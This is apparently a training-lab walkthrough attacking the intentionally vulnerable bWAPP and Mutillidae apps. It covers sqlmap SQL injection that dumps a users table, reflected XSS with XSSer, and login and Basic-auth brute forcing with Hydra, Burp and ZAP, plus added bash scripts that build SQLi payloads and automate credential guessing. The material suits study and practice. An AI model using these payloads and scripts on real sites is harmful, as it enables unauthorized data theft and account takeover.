🔬Web App Attacks
Passive Crawling - Burp Suite
🔬 Passive Crawling with Burp Suite
Target IP: 192.230.181.3 (Mutillidae II)
ip -br -c a
eth1@if203734 UP 192.230.181.2/24
nmap -sS -sV 192.230.181.3
Open the browser and navigate to http://192.230.181.3/
Activate the FoxyProxy plugin
Start BurpSuite (set User options/Display/Look to Darcula and restart BurpSuite)
Intercept the home page request, then turn Intercept off
Check the HTTP history tab
Browse the Mutillidae web app: this is a passive crawl, Burp only records the pages the browser actually requests through the proxy and sends no requests of its own

Check the Target tab for the Site map
Add the site to the Scope

SQL Injection - SQLMap
Target IP: 192.42.186.3 (bWAPP)
ip -br -c a
eth1@if178967 UP 192.42.186.2/24
nmap -sS -sV 192.42.186.3
Open the browser and navigate to http://192.42.186.3/, login with bee:bug, select SQL Injection (GET/Search) and click the Hack button
Input a string and search
http://192.42.186.3/sqli_1.php?title=hacking&action=search
Activate the FoxyProxy plugin
Start BurpSuite in Intercept mode
Refresh the page, intercept the request and copy the Cookie header (the session cookie is needed because bWAPP serves the login page to anonymous requests, and security_level=0 selects the unfiltered low-security version of the page)
Cookie: PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0

Run sqlmap, defining title as the test parameter
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title

---
Parameter: title (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=hacking' AND (SELECT 1664 FROM (SELECT(SLEEP(5)))MSwT) AND 'jFDG'='jFDG&action=search
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=hacking' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a767171,0x7379784e74504d4e76744b6e4c524b4e516a4f4f7878676a51734e6d4c744d547450424844474f76,0x7171707071),NULL,NULL-- -&action=search
---
In BurpSuite, send the request to Repeater
Copy the first payload from SQLMap and paste it as the value of the title parameter (select the pasted text and press Ctrl+U so the quotes, spaces and parentheses are URL-encoded before sending)
hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search

Use sqlmap to list the databases, then the tables of the bWAPP database
# List databases
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs

# List tables in bWAPP
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables

Use sqlmap to get a list of columns in the users table of the bWAPP database
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns

Dump the admin flag, password and email columns of the users table (the password column holds hashes; sqlmap offers to crack them with its built-in dictionary attack)
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump

Turn off Intercept mode in BurpSuite, navigate to http://192.42.186.3/sqli_6.php and turn Intercept mode back on
Search the example string from the page and intercept the request
Save the intercepted request to a file named request (right click, Copy to file)
Use sqlmap with this request file; it takes the method, the Cookie header and the POST parameters from the file, so no --cookie option is needed
sqlmap -r request -p title

---
Parameter: title (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=example' AND (SELECT 9391 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9391=9391,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Yvps'='Yvps&action=search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=example' AND (SELECT 6244 FROM (SELECT(SLEEP(5)))dWNC) AND 'Hfwn'='Hfwn&action=search
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=example' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7071,0x7463445853774f49666461525a4b446d4a624a706a414976706b56495977444675766767546d6347,0x7162717871),NULL-- -&action=search
---
In BurpSuite, send the request to Repeater and try the payloads proposed by SQLMap

Change the request so the injected query calls the version() function: in the error-based payload replace the inner (SELECT (ELT(9391=9391,1))) with version(), and the database version comes back between the two marker strings inside the Duplicate entry error message
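The following bash script is an added example, not part of the lab and not sqlmap's code. It shows what the error-based payload reported by sqlmap above actually does and how to reuse it by hand: it rebuilds the FLOOR/GROUP BY payload around any scalar expression such as version(), URL-encodes it for the title parameter, decodes the hex marker strings sqlmap wraps around the extracted value, and cuts that value out of the error message. The marker values are the ones from the GET run above (sqlmap picks new ones every run); the MySQL error text and the version string inside it are constructed samples, not output from the lab host.

```shell
#!/usr/bin/env bash
# Added example (not from the lab or from sqlmap): the error-based payload
# sqlmap reported, taken apart and rebuilt by hand.
#
# 0x716a767171 / 0x7171707071 are plain ASCII strings ("qjvqq" / "qqppq")
# that sqlmap places around the extracted value so it can cut it out of
# the MySQL error text: Duplicate entry '<prefix><value><suffix>1' for key.
# FLOOR(RAND(0)*2) is a deterministic sequence, so GROUP BY on a value
# built from it raises a duplicate-key error that echoes the grouped value.

PREFIX_HEX=716a767171   # "qjvqq"  (markers from the GET run on this page)
SUFFIX_HEX=7171707071   # "qqppq"

# Decode a hex string (with or without a leading 0x) to the ASCII it encodes.
# Printable input only: control characters would be lost in the substitution.
hex2str() {
  local h="${1#0x}" out="" i
  for (( i = 0; i < ${#h}; i += 2 )); do
    out+=$(printf "\\x${h:i:2}")
  done
  printf '%s' "$out"
}

# Build the FLOOR/GROUP BY error-based payload around an arbitrary scalar
# SQL expression (version(), user(), a sub-select returning one row, ...).
# Output is the raw value of the vulnerable parameter, not yet URL-encoded.
build_error_payload() {
  local expr="$1"
  printf "hacking' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x%s,(%s),0x%s,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'a'='a" \
    "$PREFIX_HEX" "$expr" "$SUFFIX_HEX"
}

# Percent-encode a parameter value (pure bash, ASCII input) so the quotes,
# spaces and parentheses survive in a GET query string or a POST body.
urlencode() {
  local s="$1" out="" i c
  for (( i = 0; i < ${#s}; i++ )); do
    c="${s:i:1}"
    case "$c" in
      [a-zA-Z0-9.~_-]) out+="$c" ;;
      *) out+=$(printf '%%%02X' "'$c") ;;
    esac
  done
  printf '%s' "$out"
}

# Pull the value out of an error response, given the two marker strings.
# Returns 1 when the prefix marker is absent (the injection did not fire).
extract_between() {
  local body="$1" pre="$2" suf="$3" rest
  [[ "$body" == *"$pre"* ]] || return 1
  rest="${body#*"$pre"}"
  printf '%s' "${rest%%"$suf"*}"
}

# Constructed sample of the MySQL error bWAPP echoes back; the version
# string in it is made up for the example, not taken from the lab host.
SAMPLE_ERROR="Error: Duplicate entry 'qjvqq5.7.0-constructedqqppq1' for key 'group_key'"

main() {
  local payload
  payload=$(build_error_payload 'SELECT version()')
  echo "raw payload : $payload"
  echo "GET query   : title=$(urlencode "$payload")&action=search"
  echo "markers     : $(hex2str 0x$PREFIX_HEX) ... $(hex2str 0x$SUFFIX_HEX)"
  echo "extracted   : $(extract_between "$SAMPLE_ERROR" "$(hex2str $PREFIX_HEX)" "$(hex2str $SUFFIX_HEX)")"
}

main "$@"
```

The same raw payload works for the POST form on sqli_6.php; only the transport differs (put the URL-encoded value in the body instead of the query string). Swapping the expression for `(SELECT password FROM users LIMIT 0,1)` is how sqlmap walks a table one row at a time with this technique.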

XSS Attack - XSSer
Target IP: 192.131.167.3 (Mutillidae II)
ip -br -c a
eth1@if178967 UP 192.131.167.2/24
nmap -sS -sV 192.131.167.3
# If Firefox does not start, find the leftover process and kill it
ps -e | grep firefox
kill <PID>
Navigate to the XSS Reflected - DNS Lookup webpage: http://192.131.167.3/index.php?page=dns-lookup.php
Enter any text and click Lookup DNS: the value is reflected back on the web page

Activate the FoxyProxy plugin and start BurpSuite
Enter any text, click Lookup DNS and intercept the request in BurpSuite
Copy the POST body and replace the target_host value with XSS, the placeholder xsser substitutes its payloads into

Use xsser to check the vulnerability (the string after -p is the POST body taken from the intercepted request)
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'

xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto

Use a custom XSS payload
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>"

Copy the Final Attack payload and use it in the browser or BurpSuite to trigger the XSS attack (xsser rewrites the form submission as a GET request, which this page accepts)
http://192.131.167.3/index.php?page=dns-lookup.php&target_host=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&dns-lookup-php-submit-button=Lookup+DNS


Perform an XSS Poll Question attack over a GET request: http://192.131.167.3/index.php?page=user-poll.php
Submit a vote, copy the resulting URL, replace the nmap value of choice with XSS and pass it to XSSer
http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=2&user-poll-php-submit-button=Submit+Vote
xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote"

xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>"

Open the Final Attack link in the browser
http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&initials=2&user-poll-php-submit-button=Submit+Vote

Authenticated XSS Attack - XSSer
🔬 Authenticated XSS Attack with XSSer
Target IP: 192.56.179.3 (bWAPP)
ip -br -c a
eth1@if178967 UP 192.56.179.2/24
nmap -sS -sV 192.56.179.3
Login with bee:bug, select the HTML Injection - Reflected (GET) bug and input any value. Copy the URL
http://192.56.179.3/htmli_get.php?firstname=hi&lastname=hi&form=submit
Activate the FoxyProxy plugin, start BurpSuite, refresh the webpage and copy the Cookie from the request intercepted in Proxy
PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0
Stop the BurpSuite interceptor, then run the xsser tool replacing the firstname value with XSS and feeding it the Cookie; without the session cookie xsser only reaches the login page, and security_level=0 keeps the low-security (unfiltered) page
xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0"

xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0" --Fp "<script>alert(1)</script>"

Attacking HTTP Login Form - Hydra
🔬 Attacking HTTP Login Form with Hydra
Target IP: 192.210.201.3 (bWAPP)
ip -br -c a
eth1@if178967 UP 192.210.201.2/24
nmap -sS -sV 192.210.201.3
Open the http://192.210.201.3/login.php page, view the source code and check the parameters passed by the login form (login, password, security_level and form, which are the fields used in the hydra module string below).

Prepare a usernames and a passwords list
echo -e "admin\nbee\nuser1\nuser2" > users
cat /root/Desktop/wordlists/100-common-passwords.txt > pws
echo "bug" >> pws
Use hydra to retrieve the credentials. The http-post-form module string is path:POST body:failure condition, with ^USER^ and ^PASS^ substituted from the lists; the text after the last colon must be copied exactly from a failed login response, because every response that does not contain it is reported as valid credentials
hydra -L users -P pws 192.210.201.3 http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"
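The bash script below is an added example, not from the lab, from hydra or from bWAPP. It reproduces the two things that decide whether the hydra run above reports the right credentials: the POST body hydra submits (sent here as one curl request so the failure string can be verified before the real run) and hydra's "F=" rule, under which a response containing the failure string is a miss and any other response is a hit. The target URL and form fields are the ones from the hydra command; the two page bodies used by main() are constructed samples, and try_login is the only function that needs the lab network. The same pass/fail reasoning applies to the ZAP fuzzer section at the end of this page, which judges by the 302 instead of by the message.

```shell
#!/usr/bin/env bash
# Added example, not from the lab, from hydra or from bWAPP: the decision
# rule behind hydra's http-post-form module, plus a manual curl attempt
# with the same fields so the failure string can be checked byte for byte.

TARGET="http://192.210.201.3/login.php"
FAIL_STRING='Invalid credentials or user not activated!'

# hydra's F= rule: failure string present -> miss, absent -> hit.
# A mistyped FAIL_STRING therefore turns every single guess into a "hit".
classify_response() {
  local body="$1" fail="$2"
  if [[ "$body" == *"$fail"* ]]; then echo miss; else echo hit; fi
}

# One manual attempt with the same fields as the hydra module string.
# Needs the lab network; prints the status code and the classification.
try_login() {
  local user="$1" pass="$2" out status body
  out=$(curl -s -w '\n%{http_code}' \
        --data-urlencode "login=$user" --data-urlencode "password=$pass" \
        --data "security_level=0&form=submit" "$TARGET")
  status="${out##*$'\n'}"
  body="${out%$'\n'*}"
  printf '%s:%s -> HTTP %s, %s\n' "$user" "$pass" "$status" \
    "$(classify_response "$body" "$FAIL_STRING")"
}

# Expand a users file and a passwords file into the user:pass lines that
# hydra's -C option takes, in the order hydra itself uses with -L/-P
# (every password for the first user, then the next user).
combos() {
  local users="$1" pws="$2" u p
  while IFS= read -r u || [[ -n "$u" ]]; do
    while IFS= read -r p || [[ -n "$p" ]]; do
      printf '%s:%s\n' "$u" "$p"
    done < "$pws"
  done < "$users"
}

# Constructed stand-ins for the bWAPP login page: a failed login re-renders
# the form with the red error text, a successful one redirects to the portal
# and does not echo that text.
FAILED_PAGE='<form action="login.php" method="POST"><font color="red">Invalid credentials or user not activated!</font></form>'
SUCCESS_PAGE='<html><body>Redirecting to portal.php</body></html>'

main() {
  echo "failed page      -> $(classify_response "$FAILED_PAGE" "$FAIL_STRING")"
  echo "successful login -> $(classify_response "$SUCCESS_PAGE" "$FAIL_STRING")"
  echo "typo in F=       -> $(classify_response "$FAILED_PAGE" 'Invalid credentials or user not activated.')   (false positive)"
}

main "$@"
```

Run `try_login bee wrongpassword` once before the hydra command: if it prints "miss" the failure string is exact, if it prints "hit" hydra would report every password in the list as valid. hydra also accepts an S= condition (a string that only appears on success, such as the redirect target), which is the safer choice when the error message varies.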

Attacking Basic Auth - BurpSuite
🔬 Attacking Basic Auth with Burp Suite
Target IP: 192.190.241.3 (bWAPP)
ip -br -c a
eth1@if178967 UP 192.190.241.2/24
nmap -sS -sV 192.190.241.3
Open Firefox, activate the FoxyProxy plugin, start BurpSuite, open http://192.190.241.3/basic and intercept the request. Forward the request, input some data and intercept the request again
The /basic directory uses Basic Auth; send the request to Intruder

Navigate to the Intruder - Positions tab
Decode the base64 string of the Authorization: Basic header: it becomes test:test, the data entered in the login form

Replace the base64 credentials with a payload position, like §credentials§

In the Payload Options, load the /root/Desktop/wordlists/100-common-passwords.txt list
In the Payload Processing, add an Add prefix rule with admin: so that it is prepended to every password, then add an Encode - Base64-encode rule
In the Payload Encoding settings, untick URL-encode these characters (the default character set includes =, which would mangle the padding of the base64 value)
Start the attack
Check the entry with status code 301 (the other attempts get 401)
Send its Authorization: Basic value to Decoder and check the BurpSuite Decoder tab

Decoded as a base64 string it is admin:cookie1

Turn off BurpSuite interceptor, open the web page and insert the found credentials
🚩 The flag is
d25db4ce54b60b49dfd7b32c52ed8d26
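The bash script below is an added example, not from the lab or from Burp. It does from the shell what the Intruder payload processing chain above does (prefix admin:, then Base64-encode), so the candidate Authorization headers can be generated, sent with curl and the winning one decoded without the GUI. The wordlist path and the /basic URL are the ones from this section; main() uses a small constructed wordlist so the script runs offline, and brute_basic is the only function that needs the lab network.

```shell
#!/usr/bin/env bash
# Added example (not from the lab or from Burp): Intruder's "Add prefix" +
# "Base64-encode" payload chain for Basic auth, reproduced in bash.

# Build the Authorization header value for one user:password pair.
basic_value() {
  printf '%s:%s' "$1" "$2" | base64 | tr -d '\n'
}

# Decode a Basic value back to user:password (what Burp's Decoder did above).
basic_decode() {
  printf '%s' "$1" | base64 -d
}

# Emit one "password<TAB>Basic value" line per wordlist entry: the same
# payload set Intruder generates with an "Add prefix admin:" + "Base64-encode"
# chain.  Nothing is URL-encoded, so the trailing = padding stays intact.
basic_payloads() {
  local user="$1" wordlist="$2" p
  while IFS= read -r p || [[ -n "$p" ]]; do
    printf '%s\t%s\n' "$p" "$(basic_value "$user" "$p")"
  done < "$wordlist"
}

# Try the whole list against a Basic-protected URL and report the first
# answer that is not 401.  Needs the lab network; on this page the valid
# pair answered 301.  Usage: brute_basic http://192.190.241.3/basic admin \
#   /root/Desktop/wordlists/100-common-passwords.txt
brute_basic() {
  local url="$1" user="$2" wordlist="$3" p enc code
  while IFS=$'\t' read -r p enc; do
    code=$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: Basic $enc" "$url")
    if [[ "$code" != 401 ]]; then
      printf 'HTTP %s with %s:%s\n' "$code" "$user" "$p"
      return 0
    fi
  done < <(basic_payloads "$user" "$wordlist")
  return 1
}

main() {
  # Constructed three-entry wordlist so the example runs without the lab file.
  local tmp
  tmp=$(mktemp)
  printf 'password\n123456\ncookie1\n' > "$tmp"
  basic_payloads admin "$tmp"
  echo "decoded: $(basic_decode "$(basic_value admin cookie1)")"
  rm -f "$tmp"
}

main "$@"
```

Because the credentials travel in a header rather than in the body, any encoding applied to the payload ends up inside the header value; this is why Intruder's default URL-encoding has to be switched off for this attack, while curl above sends the value untouched.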

Attacking HTTP Login Form - ZAProxy
🔬 Attacking HTTP Login Form with ZAProxy
Target IP: 192.145.79.3 (bWAPP)
ip -br -c a
eth1@if178967 UP 192.145.79.2/24
nmap -sS -sV 192.145.79.3
Open the owasp-zap tool, select Manual Explore, input the URL http://192.145.79.3 and launch the browser
Attempt a login with bad credentials. The website will be added to the Sites tree inside ZAP

Right click on the POST request and select Fuzz...

Select the username value, click the Add button, then Add again and input the payloads for the username. Confirm with OK

Select the password value and do the same with a list of possible passwords

Start the Fuzzer to run the attack and check the results: the valid pair is the request that gets a 302 redirect to the portal, while the failed attempts get a 200 with the error message

